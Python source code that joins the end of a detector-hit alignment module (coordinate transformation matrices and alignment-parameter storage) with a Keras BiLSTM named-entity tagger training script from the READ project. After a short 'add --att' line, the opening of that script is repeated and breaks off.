by a rotation = R(alpha, beta, gamma).T in the local coordinate system.
Note
----
- This function is the inverse of
local_to_global_transformation_matrix()
- The resulting transformation matrix is 4 x 4
- Translation and Rotation operations are not commutative
Parameters
----------
x : float
Translation in x.
y : float
Translation in y.
z : float
Translation in z.
alpha : float
Angle in radians for rotation around x.
beta : float
Angle in radians for rotation around y.
gamma : float
Angle in radians for rotation around z.
Returns
-------
Array with shape (4, 4).
'''
# Extend rotation matrix R by one dimension
R = np.eye(4, 4, 0)
R[:3, :3] = rotation_matrix(alpha, beta, gamma).T
# Get translation matrix T
T = translation_matrix(-x, -y, -z)
return np.dot(R, T)
def local_to_global_transformation_matrix(x, y, z, alpha, beta, gamma):
''' Transformation matrix that applies a inverse translation and rotation.
Inverse rotation in the local coordinate system followed by an inverse
translation by x, y, z to the global coordinate system.
Note
----
- The resulting transformation matrix is 4 x 4
- Translation and Rotation operations do not commutative
Parameters
----------
x : float
Translation in x.
y : float
Translation in y.
z : float
Translation in z.
alpha : float
Angle in radians for rotation around x.
beta : float
Angle in radians for rotation around y.
gamma : float
Angle in radians for rotation around z.
Returns
-------
Array with shape (4, 4).
'''
# Extend inverse rotation matrix R by one dimension
R = np.eye(4, 4, 0)
R[:3, :3] = rotation_matrix(alpha, beta, gamma)
# Get inverse translation matrix T
T = translation_matrix(x, y, z)
return np.dot(T, R)
def apply_transformation_matrix(x, y, z, transformation_matrix):
''' Takes arrays for x, y, z and applies a transformation matrix (4 x 4).
Parameters
----------
x : array
Array of x coordinates.
y : array
Array of y coordinates.
z : array
Array of z coordinates.
Returns
-------
Array with transformed coordinates.
'''
# Add extra 4th dimension
pos = np.column_stack((x, y, z, np.ones_like(x))).T
# Transform and delete extra dimension
pos_T = np.dot(transformation_matrix, pos).T[:, :-1]
return pos_T[:, 0], pos_T[:, 1], pos_T[:, 2]
def apply_rotation_matrix(x, y, z, rotation_matrix):
''' Takes array in x, y, z and applies a rotation matrix (3 x 3).
Parameters
----------
x : array
Array of x coordinates.
y : array
Array of x coordinates.
z : array
Array of x coordinates.
Returns
-------
Array with rotated coordinates.
'''
pos = np.column_stack((x, y, z)).T
pos_T = np.dot(rotation_matrix, pos).T
return pos_T[:, 0], pos_T[:, 1], pos_T[:, 2]
def apply_alignment(hits_x, hits_y, hits_z, dut_index, alignment=None,
prealignment=None, inverse=False):
''' Takes hits and applies a transformation according to the alignment data.
If alignment data with rotations and translations are given the hits are
transformed according to the rotations and translations.
If pre-alignment data with offsets and slopes are given the hits are
transformed according to the slopes and offsets.
If both are given alignment data is taken.
The transformation can be inverted.
Parameters
---------
hits_x, hits_y, hits_z : array
Array with corresponding hit positions.
dut_index : int
Needed to select the corrct alignment info.
alignment : array
Alignment information with rotations and translations.
prealignment : array
Pre-alignment information with offsets and slopes.
inverse : bool
Apply inverse transformation if True.
Returns
-------
hits_x, hits_y, hits_z : array
Array with transformed hit positions.
'''
if (alignment is None and prealignment is None) or \
(alignment is not None and prealignment is not None):
raise RuntimeError('Neither pre-alignment or alignment data given.')
if alignment is not None:
if inverse:
logging.debug('Transform hit position into the local coordinate '
'system using alignment data')
transformation_matrix = global_to_local_transformation_matrix(
x=alignment[dut_index]['translation_x'],
y=alignment[dut_index]['translation_y'],
z=alignment[dut_index]['translation_z'],
alpha=alignment[dut_index]['alpha'],
beta=alignment[dut_index]['beta'],
gamma=alignment[dut_index]['gamma'])
else:
logging.debug('Transform hit position into the global coordinate '
'system using alignment data')
transformation_matrix = local_to_global_transformation_matrix(
x=alignment[dut_index]['translation_x'],
y=alignment[dut_index]['translation_y'],
z=alignment[dut_index]['translation_z'],
alpha=alignment[dut_index]['alpha'],
beta=alignment[dut_index]['beta'],
gamma=alignment[dut_index]['gamma'])
hits_x, hits_y, hits_z = apply_transformation_matrix(
x=hits_x,
y=hits_y,
z=hits_z,
transformation_matrix=transformation_matrix)
else:
c0_column = prealignment[dut_index]['column_c0']
c1_column = prealignment[dut_index]['column_c1']
c0_row = prealignment[dut_index]['row_c0']
c1_row = prealignment[dut_index]['row_c1']
z = prealignment[dut_index]['z']
if inverse:
logging.debug('Transform hit position into the local coordinate '
'system using pre-alignment data')
hits_x = (hits_x - c0_column) / c1_column
hits_y = (hits_y - c0_row) / c1_row
hits_z -= z
else:
logging.debug('Transform hit position into the global coordinate '
'system using pre-alignment data')
hits_x = (c1_column * hits_x + c0_column)
hits_y = (c1_row * hits_y + c0_row)
hits_z += z
return hits_x, hits_y, hits_z
def merge_alignment_parameters(old_alignment, new_alignment, mode='relative',
select_duts=None):
if select_duts is None: # Select all DUTs
dut_sel = np.ones(old_alignment.shape[0], dtype=np.bool)
else:
dut_sel = np.zeros(old_alignment.shape[0], dtype=np.bool)
dut_sel[np.array(select_duts)] = True
# Do not change input parameters
alig_pars = old_alignment.copy()
if mode == 'absolute':
logging.info('Set alignment')
alig_pars[dut_sel] = new_alignment[dut_sel]
return alig_pars
elif mode == 'relative':
logging.info('Merge new alignment with old alignment')
alig_pars['translation_x'][dut_sel] += new_alignment[
'translation_x'][dut_sel]
alig_pars['translation_y'][dut_sel] += new_alignment[
'translation_y'][dut_sel]
alig_pars['translation_z'][dut_sel] += new_alignment[
'translation_z'][dut_sel]
alig_pars['alpha'][dut_sel] += new_alignment['alpha'][dut_sel]
alig_pars['beta'][dut_sel] += new_alignment['beta'][dut_sel]
alig_pars['gamma'][dut_sel] += new_alignment['gamma'][dut_sel]
# TODO: Is this always a good idea? Usually works, but what if one
# heavily tilted device?
# All alignments are relative, thus center them around 0 by
# substracting the mean (exception: z position)
if np.count_nonzero(dut_sel) > 1:
alig_pars['alpha'][dut_sel] -= np.mean(alig_pars['alpha'][dut_sel])
alig_pars['beta'][dut_sel] -= np.mean(alig_pars['beta'][dut_sel])
alig_pars['gamma'][dut_sel] -= np.mean(alig_pars['gamma'][dut_sel])
alig_pars['translation_x'][dut_sel] -= np.mean(alig_pars[
'translation_x'][dut_sel])
alig_pars['translation_y'][dut_sel] -= np.mean(alig_pars[
'translation_y'][dut_sel])
return alig_pars
else:
raise RuntimeError('Unknown mode %s', str(mode))
def store_alignment_parameters(alignment_file, alignment_parameters,
mode='absolute', select_duts=None):
''' Stores alignment parameters (rotations, translations) into file.
Absolute (overwriting) and relative (add angles, translations) supported.
Parameters
---------
alignment_file : string
The pytables file name containing the alignment.
alignment_parameters : recarray
An array with the alignment values.
mode : string
Select relative or absolute alignment. The strings 'relative' and 'absolute' are supported.
use_duts : iterable
In relative mode only change specified DUTs.
'''
description = np.zeros((1,), dtype=alignment_parameters.dtype).dtype
# Open file with alignment data
with tb.open_file(alignment_file, mode="r+") as out_file:
try:
align_tab = out_file.create_table(out_file.root, name='Alignment',
title='Table containing the '
'alignment geometry parameters '
'(translations and rotations)',
description=description,
filters=tb.Filters(
complib='blosc',
complevel=5,
fletcher32=False))
align_tab.append(alignment_parameters)
except tb.NodeError:
align_pars = merge_alignment_parameters(
old_alignment=out_file.root.Alignment[:],
new_alignment=alignment_parameters,
mode=mode,
select_duts=select_duts)
logging.info('Overwrite existing alignment!')
# Remove old node, is there a better way?
out_file.root.Alignment._f_remove()
align_tab = out_file.create_table(out_file.root, name='Alignment',
title='Table containing the '
'alignment geometry parameters '
'(translations and rotations)',
description=description,
filters=tb.Filters(
complib='blosc',
complevel=5,
fletcher32=False))
align_tab.append(align_pars)
string = "\n".join(['DUT%d: alpha=%1.4f, beta=%1.4f, gamma=%1.4f Rad, '
'x/y/z=%d/%d/%d um' % (dut_values['DUT'],
dut_values['alpha'],
dut_values['beta'],
dut_values['gamma'],
dut_values['translation_x'],
dut_values['translation_y'],
dut_values['translation_z'])
for dut_values in align_pars])
logging.info('Set alignment parameters to:\n%s' % string)
|
# -*- coding: utf-8 -*-
"""
taggerTrainingKeras.py
train Deep Named entities tagger
H. Déjean
copyright Naverlabs 2017
READ project
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Developed for the EU project READ. The READ project has received funding
from the European Union's Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import sys,os
from io import open
from optparse import OptionParser
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))))
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.base import BaseEstimator, TransformerMixin
os.environ['KERAS_BACKEND'] = 'tensorflow'
from keras.models import Sequential, load_model, Model
from keras.layers import Bidirectional, Dropout, Input
from keras.layers.wrappers import TimeDistributed
from keras.layers.recurrent import LSTM
from keras.layers.core import Dense, Masking
from keras.regularizers import L1L2
import numpy as np
import pickle
import gzip
from contentProcessing.attentiondecoder import AttentionDecoder
class Transformer(BaseEstimator, TransformerMixin):
def __init__(self):
BaseEstimator.__init__(self)
TransformerMixin.__init__(self)
def fit(self, l, y=None):
return self
def transform(self, l):
assert False, "Specialize this method!"
class SparseToDense(Transformer):
def __init__(self):
Transformer.__init__(self)
def transform(self, o):
return o.toarray()
class NodeTransformerTextEnclosed(Transformer):
"""
we will get a list of block and need to send back what a textual feature extractor (TfidfVectorizer) needs.
So we return a list of strings
"""
def transform(self, lw):
return map(lambda x: x, lw)
class DeepTagger():
usage = ""
version = "v.01"
description = "description: keras/bilstm ner"
def __init__(self):
self.dirName = None
self.sModelName = None
self.sAux = "aux.pkl"
self.nbClasses = None
self.max_sentence_len = 0
self.max_features = 100
self.maxngram = 3
self.nbEpochs = 10
self.batch_size = 50
self.hiddenSize= 32
self.bGridSearch = False
self.bTraining_multitype,self.bTraining, self.bTesting, self.bPredict = False,False,False, False
self.lTrain = []
self.lTest = []
self.lPredict= []
self.bMultiType = False
# mapping vector
self.tag_vector={}
def setParams(self,dParams):
"""
"""
if dParams.dirname:
self.dirName = dParams.dirname
if dParams.name:
self.sModelName = dParams.name
if dParams.batchSize:
self.batch_size = dParams.batchSize
if dParams.nbEpochs:
self.nbEpochs = dParams.nbEpochs
if dParams.hidden:
self.hiddenSize = dParams.hidden
if dParams.nbfeatures:
self.max_features = dParams.nbfeatures
if dParams.ngram:
self.maxngram = dParams.ngram
self.bMultiType = dParams.multitype
if dParams.training:
self.lTrain = dParams.training
self.bTraining=True
if dParams.testing:
self.lTest = dParams.testing
self.bTesting=True
if dParams.predict:
self._sent =dParams.predict #.decode('latin-1')
self.bPredict=True
def initTransformeur(self):
self.cv= CountVectorizer( max_features = self.max_features
, analyzer = 'char' ,ngram_range = (1,self.maxngram)
, dtype=np.float64)
self.node_transformer = FeatureUnion([
("ngrams", Pipeline([
('selector', NodeTransformerTextEnclosed()),
('cv', self.cv),
('todense', SparseToDense())
])
)
])
def load_data_Multitype(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
"""
self.nbClasses = 0
self.lClasses=[]
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
lTmp.append(x)
self.max_sentence_len = max(self.max_sentence_len,len(x))
x=[]
else:
try:
la=l.split('\t')
b1=la[-1].split('_')[0]
b2=la[-1].split('_')[1]
except ValueError:
#print 'cannot find value and label in: %s'%(l)
continue
assert len(la) != 0
if b2 not in self.lClasses:
self.lClasses.append(b2)
if b1 not in self.lClasses:
self.lClasses.append(b1)
x.append((la[0],(b1,b2)))
if x != []:
lTmp.append(x)
f.close()
self.nbClasses = len(self.lClasses) + 1
for tag_class_id,b in enumerate(self.lClasses):
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[tag_class_id] = 1
self.tag_vector[b] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = b
# Add nil class
if 'NIL' not in self.tag_vector:
self.lClasses.append('NIL')
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[self.nbClasses-1] = 1
self.tag_vector['NIL'] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = 'NIL'
# print self.nbClasses
# shuffle(lTmp)
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
"""
self.nbClasses = 0
self.lClasses=[]
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
lTmp.append(x)
self.max_sentence_len = max(self.max_sentence_len,len(x))
x=[]
else:
try:
la=l.split('\t')
b1=la[-1]
except ValueError:
print ('cannot find value and label in: %s'%(l))
sys.exit()
assert len(la) != 0
if b1 not in self.lClasses:
self.lClasses.append(b1)
x.append((la[0],b1))
if x != []:
lTmp.append(x)
f.close()
self.nbClasses = len(self.lClasses) + 1
for tag_class_id,b in enumerate(self.lClasses):
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[tag_class_id] = 1
self.tag_vector[b] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = b
# Add nil class
if 'NIL' not in self.tag_vector:
self.lClasses.append('NIL')
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[self.nbClasses-1] = 1
self.tag_vector['NIL'] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = 'NIL'
# print self.nbClasses
# shuffle(lTmp)
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data_for_testing(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
loadModel first!
"""
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
if x!=[]:
lTmp.append(x)
x=[]
else:
try:
la=l.split('\t')
b1=la[-1]
except ValueError:
print('cannot find value and label in: %s'%(l))
sys.exit(1)
x.append((la[0],b1))
if x != []:
lTmp.append(x)
f.close()
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data_for_testing_Multitype(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
loadModel first!
"""
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
if x!=[]:
lTmp.append(x)
x=[]
else:
try:
la=l.split('\t')
b1=la[-1].split('_')[0]
b2=la[-1].split('_')[1]
except ValueError:
print('ml:cannot find value and label in: %s'%(l))
sys.exit()
assert len(la) != 0
x.append((la[0],(b1,b2)))
if x != []:
lTmp.append(x)
f.close()
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def storeModel(self,model, aux):
"""
store model and auxillary data (transformer)
"""
model.save('%s/%s.hd5'%(self.dirName,self.sModelName))
print('model dumped in %s/%s.hd5' % (self.dirName,self.sModelName))
#max_features,max_sentence_len, self.nbClasses,self.tag_vector , node_transformer
pickle.dump((self.bMultiType,self.maxngram,self.max_features,self.max_sentence_len,self.nbClasses,self.tag_vector,self.node_transformer),gzip.open('%s/%s.%s'%(self.dirName,self.sModelName,self.sAux),'wb'))
print('aux data dumped in %s/%s.%s' % (self.dirName,self.sModelName,self.sAux))
def loadModels(self):
"""
load models and aux data
"""
self.model = load_model(os.path.join(self.dirName,self.sModelName+'.hd5'),custom_objects={"AttentionDecoder": AttentionDecoder})
print('model loaded: %s/%s.hd5' % (self.dirName,self.sModelName))
try:
self.bMultiType,self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses,self.tag_vector , self.node_transformer = pickle.load(gzip.open('%s/%s.%s'%(self.dirName,self.sModelName,self.sAux),'r'))
except:
self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses,self.tag_vector , self.node_transformer = pickle.load(gzip.open('%s/%s.%s'%(self.dirName,self.sModelName,self.sAux),'r'))
self.bMultiType = False
print('aux data loaded: %s/%s.%s' % (self.dirName,self.sModelName,self.sAux))
print("ngram: %s\tmaxfea=%s\tpadding=%s\tnbclasses=%s" % (self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses))
print("multitype model:%s"%(self.bMultiType))
def training(self,traindata):
"""
training
"""
train_X,_ = traindata #self.load_data(self.lTrain)
self.initTransformeur()
fX= [item for sublist in train_X for item in sublist ]
self.node_transformer.fit(fX)
#
lX,lY = self.prepareTensor(traindata)
# print lX.shape
# print lY.shape
model = Sequential()
reg= L1L2(l1=0.001, l2=0.0)
model.add(Masking(mask_value=0., input_shape=(self.max_sentence_len, self.max_features)))
model.add(Bidirectional(LSTM(self.hiddenSize,return_sequences = True,bias_regularizer=reg)))
model.add(Dropout(0.5))
model.add(AttentionDecoder(self.max_sentence_len, self.nbClasses))
model.add(TimeDistributed(Dense(self.nbClasses, activation='softmax')))
#keras.optimizers.RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)
model.compile(loss='categorical_crossentropy', optimizer='rmsprop',metrics=['categorical_accuracy'] )
print (model.summary())
_ = model.fit(lX, lY, epochs = self.nbEpochs,batch_size = self.batch_size, verbose = 1,validation_split = 0.33, shuffle=True)
del lX,lY
auxdata = self.max_features,self.max_sentence_len,self.nbClasses,self.tag_vector,self.node_transformer
return model, auxdata
def training_multitype(self,traindata):
"""
training
"""
train_X,_ = traindata #self.load_data(self.lTrain)
self.initTransformeur()
fX= [item for sublist in train_X for item in sublist ]
self.node_transformer.fit(fX)
#
lX,(lY,lY2) = self.prepareTensor_multitype(traindata)
# print lX.shape
# print lY.shape
inputs = Input(shape=(self.max_sentence_len, self.max_features))
x = Masking(mask_value=0)(inputs)
x = Bidirectional(LSTM(self.hiddenSize,return_sequences = True))(x)
x = Dropout(0.5)(x)
out1 = TimeDistributed(Dense(self.nbClasses, activation='softmax'),name='BIES')(x)
out2 = TimeDistributed(Dense(self.nbClasses, activation='softmax'),name='Label')(x)
model = Model(input = inputs,output = [out1,out2])
model.compile(loss='categorical_crossentropy', optimizer='rmsprop',metrics=['categorical_accuracy'] )
print (model.summary())
_ = model.fit(lX, [lY,lY2], epochs = self.nbEpochs,batch_size = self.batch_size, verbose = 1,validation_split = 0.33, shuffle=True)
del lX,lY
auxdata = self.max_features,self.max_sentence_len,self.nbClasses,self.tag_vector,self.node_transformer
return model, auxdata
def prepareTensor_multitype(self,annotated):
lx,ly = annotated
lX = list()
lY1= list()
lY2= list()
# = np.array()
for x,y in zip(lx,ly):
words = self.node_transformer.transform(x)
wordsvec = []
elem_tags1 = []
elem_tags2 = []
for ix,ss in enumerate(words):
wordsvec.append(ss)
elem_tags1.append(list(self.tag_vector[y[ix][0]]))
elem_tags2.append(list(self.tag_vector[y[ix][1]]))
nil_X = np.zeros(self.max_features)
nil_Y = np.array(self.tag_vector['NIL'])
pad_length = self.max_sentence_len - len(wordsvec)
lX.append( wordsvec +((pad_length)*[nil_X]) )
lY1.append( elem_tags1 + ((pad_length)*[nil_Y]) )
lY2.append( elem_tags2 + ((pad_length)*[nil_Y]) )
del lx
del ly
lX=np.array(lX)
lY1=np.array(lY1)
lY2=np.array(lY2)
return lX,(lY1,lY2)
def prepareTensor(self,annotated):
lx,ly = annotated
lX = list()
lY= list()
# = np.array()
for x,y in zip(lx,ly):
words = self.node_transformer.transform(x)
wordsvec = []
elem_tags = []
for ix,ss in enumerate(words):
wordsvec.append(ss)
elem_tags.append(list(self.tag_vector[y[ix]]))
nil_X = np.zeros(self.max_features)
nil_Y = np.array(self.tag_vector['NIL'])
pad_length = self.max_sentence_len - len(wordsvec)
lX.append( wordsvec +((pad_length)*[nil_X]) )
lY.append( elem_tags + ((pad_length)*[nil_Y]) )
del lx
del ly
lX=np.array(lX)
lY=np.array(lY)
return lX,lY
def testModel(self,testdata):
"""
test model
"""
lX,lY= self.prepareTensor(testdata)
# print lX.shape
# print lY.shape
scores = self.model.evaluate(lX,lY,verbose=True)
print(list(zip(self.model.metrics_names,scores)))
test_x, _ = testdata
y_pred = self.model.predict(lX)
for i,_ in enumerate(lX):
pred_seq = y_pred[i]
pred_tags = []
#pad_length = self.max_sentence_len - len(test_x[i])
for class_prs in pred_seq:
class_vec = np.zeros(self.nbClasses, dtype=np.int32)
class_vec[ np.argmax(class_prs) ] = 1
if tuple(class_vec.tolist()) in self.tag_vector:
pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
print(test_x[i],pred_tags[:len(test_x[i])])
def testModel_Multitype(self,testdata):
"""
test model
"""
lX,(lY,lY2) = self.prepareTensor_multitype(testdata)
scores = self.model.evaluate(lX,[lY,lY2],verbose=True)
print(list(zip(self.model.metrics_names,scores)))
test_x, _ = testdata
y_pred1,y_pred2 = self.model.predict(lX)
for i,_ in enumerate(lX):
for pred_seq in [y_pred1[i],y_pred2[i]]:
pred_tags = []
for class_prs in pred_seq:
class_vec = np.zeros(self.nbClasses, dtype=np.int32)
class_vec[ np.argmax(class_prs) ] = 1
# print class_prs[class_prs >0.1]
if tuple(class_vec.tolist()) in self.tag_vector:
# print(self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)])
pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
print(test_x[i],pred_tags[:len(test_x[i])])
def prepareOutput_multitype(self,lToken,lLTags):
"""
format final output with MultiType
first level: BIES segmentation
remaining levels: label
assumption: no contradiction between layers
"""
chunk=[]
lChunk=[]
curTag=None
for itok,tok in enumerate(lToken):
# print(tok,lLTags[0][itok],lLTags[1][itok])
BIES,_ = lLTags[0][itok]
offset = itok
tag,score2 = lLTags[1][itok]
if tag != curTag:
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
elif BIES == 'B':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
elif BIES in ['I','E']:
chunk.append((offset,tok,score2))
elif BIES == 'S':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
if chunk !=[]:
lChunk.append((chunk,tag))
lRes=[]
for (lList,label) in lChunk:
# tok = " ".join(map(lambda x,tok,y: tok,lList))
tok = " ".join(x[1] for x in lList)
toffset = min(x[0] for x in lList),max(x[0] for x in lList)
lScore = (x[2] for x in lList)
# print toffset,tok,label,lScore
lRes.append((toffset,tok,label,list(lScore)))
return lRes
def prepareOutput(self,lToken, lTags):
"""
format final output
"""
chunk=[]
lChunk=[]
curTag=None
for offset,(tok, (tag,score)) in enumerate(list(zip(lToken,lTags))):
# print(tok.encode('utf-8'), tag)
BIES,tag = tag.split('_')
if tag != curTag:
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
elif BIES == 'B':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
elif BIES in ['I','E']:
chunk.append((offset,tok,score))
elif BIES == 'S':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
if chunk !=[]:
lChunk.append((chunk,tag))
lRes=[]
for (lList,label) in lChunk:
tok = " ".join(x[1] for x in lList)
toffset = min(x[0] for x in lList),max(x[0] for x in lList)
lScore = (x[2] for x in lList)
# tok = " ".join(map(lambda x,tok,y: tok,lList))
# toffset = (min(map(lambda offset,x,y: offset,lList)),max(map(lambda offset,x,y: offset,lList)))
# lScore = (map(lambda offset,_,score: score,lList))
lRes.append((toffset,tok,label,list(lScore)))
return lRes
def predict_multiptype(self,lsent):
"""
predict over a set of sentences (unicode)
"""
lRes= []
for mysent in lsent :
# print self.tag_vector
if len(mysent.split())> self.max_sentence_len:
print ('max sent length: %s'%self.max_sentence_len)
continue
allwords= self.node_transformer.transform(mysent.split())
# print mysent.split()
# n=len(mysent.split())
wordsvec = []
for w in allwords:
wordsvec.append(w)
lX = list()
nil_X = np.zeros(self.max_features)
pad_length = self.max_sentence_len - len(wordsvec)
lX.append( wordsvec +((pad_length)*[nil_X]) )
lX=np.array(lX)
# print(pad_length*[nil_X] + wordsvec, self.max_sentence_len)
# assert pad_length*[nil_X] + wordsvec >= self.max_sentence_len
y_pred1,y_pred2 = self.model.predict(lX)
for i,_ in enumerate(lX):
# pred_seq = y_pred[i]
l_multi_type_results = []
for pred_seq in [y_pred1[i],y_pred2[i]]:
pred_tags = []
pad_length = self.max_sentence_len - len(allwords)
for class_prs in pred_seq:
class_vec = np.zeros(self.nbClasses, dtype=np.int32)
class_vec[ np.argmax(class_prs) ] = 1
# print class_prs[class_prs >0.1]
if tuple(class_vec.tolist()) in self.tag_vector:
#print self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]
pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
l_multi_type_results.append(pred_tags[:len(allwords)])
print(l_multi_type_results)
lRes.append(self.prepareOutput_multitype(mysent.split(),l_multi_type_results))
return lRes
def predict(self,lsent):
"""
predict over a set of sentences (unicode)
"""
lRes= []
for mysent in lsent :
# print self.tag_vector
if len(mysent.split())> self.max_sentence_len:
print ('max sent length: %s'%self.max_sentence_len)
continue
allwords= self.node_transformer.transform(mysent.split())
# print mysent.split()
# n=len(mysent.split())
wordsvec = []
for w in allwords:
wordsvec.append(w)
lX = list()
nil_X = np.zeros(self.max_features)
pad_length = self.max_sentence_len - len(wordsvec)
lX.append( wordsvec +((pad_length)*[nil_X]) )
lX=np.array(lX)
# assert pad_length*[nil_X] + wordsvec >= self.max_sentence_len
y_pred = self.model.predict(lX)
for i,_ in enumerate(lX):
pred_seq = y_pred[i]
pred_tags = []
pad_length = self.max_sentence_len - len(allwords)
for class_prs in pred_seq:
class_vec = np.zeros(self.nbClasses, dtype=np.int32)
class_vec[ np.argmax(class_prs) ] = 1
# print class_prs[class_prs >0.1]
if tuple(class_vec.tolist()) in self.tag_vector:
pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
# print zip(mysent.encode('utf-8').split(),pred_tags[pad_length:])
# lRes.append((mysent.split(),pred_tags[pad_length:]))
lRes.append(self.prepareOutput(mysent.split(),pred_tags[:len(allwords)]))
return lRes
def gridSearch(self):
"""
perform grid search training
assume epochs,ngram, nbfeatures as N,N
assume testing data for cross valid
"""
def run(self):
"""
"""
if self.bGridSearch:
self.gridSearch()
if self.bMultiType and self.bTraining:
lX, lY = self.load_data_Multitype(self.lTrain)
print(lY)
model, other = self.training_multitype((lX,lY))
# store
self.storeModel(model,other)
del lX, lY
del self.node_transformer
del model
if self.bTraining and not self.bMultiType:
lX, lY = self.load_data(self.lTrain)
model, other = self.training((lX,lY))
# store
self.storeModel(model,other)
del lX, lY
del self.node_transformer
del model
if self.bTesting:
self.loadModels()
if self.bMultiType:
lX,lY = self.load_data_for_testing_Multitype(self.lTest)
res = self.testModel_Multitype((lX,lY))
else:
lX,lY = self.load_data_for_testing(self.lTest)
res = self.testModel((lX,lY))
if self.bPredict:
# which input format: [unicode]
self.loadModels()
lsent = [self._sent]
print (lsent)
if self.bMultiType:
lres = self.predict_multiptype(lsent)
else:
lres = self.predict(lsent)
for r in lres:
print (r)
if __name__ == '__main__':
cmp = DeepTagger()
cmp.parser = OptionParser(usage="", version="0.1")
cmp.parser.description = "BiLSTM approach for NER"
cmp.parser.add_option("--name", dest="name", action="store", type="string", help="model name")
cmp.parser.add_option("--dir", dest="dirname", action="store", type="string", help="directory to store model")
cmp.parser.add_option("--training", dest="training", action="append", type="string", help="training data")
cmp.parser.add_option("--ml", dest="multitype", action="store_true",default=False, help="multi type version")
cmp.parser.add_option("--hidden", dest="hidden", action="store", type="int", help="hidden layer dimension")
cmp.parser.add_option("--batch", dest="batchSize", action="store", type="int", help="batch size")
cmp.parser.add_option("--epochs", dest="nbEpochs", action="store", type="int", help="nb epochs for training")
cmp.parser.add_option("--ngram", dest="ngram", action="store", type="int", help="ngram size")
cmp.parser.add_option("--nbfeatures", dest="nbfeatures", action="store", type="int", help="nb features")
cmp.parser.add_option("--testing", dest="testing", action="append", type="string", help="test data")
cmp.parser.add_option("--run", dest="predict", action="store", type="string", help="string to be categorized")
(options, args) = cmp.parser.parse_args()
#Now we are back to the normal programmatic mode, we set the component parameters
cmp.setParams(options)
#This component is quite special since it does not take one XML as input but rather a series of files.
#doc = cmp.loadDom()
doc = cmp.run()
add --att
# -*- coding: utf-8 -*-
"""
taggerTrainingKeras.py
train Deep Named entities tagger
H. Déjean
copyright Naverlabs 2017
READ project
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Developed for the EU project READ. The READ project has received funding
from the European Union's Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import sys,os
from io import open
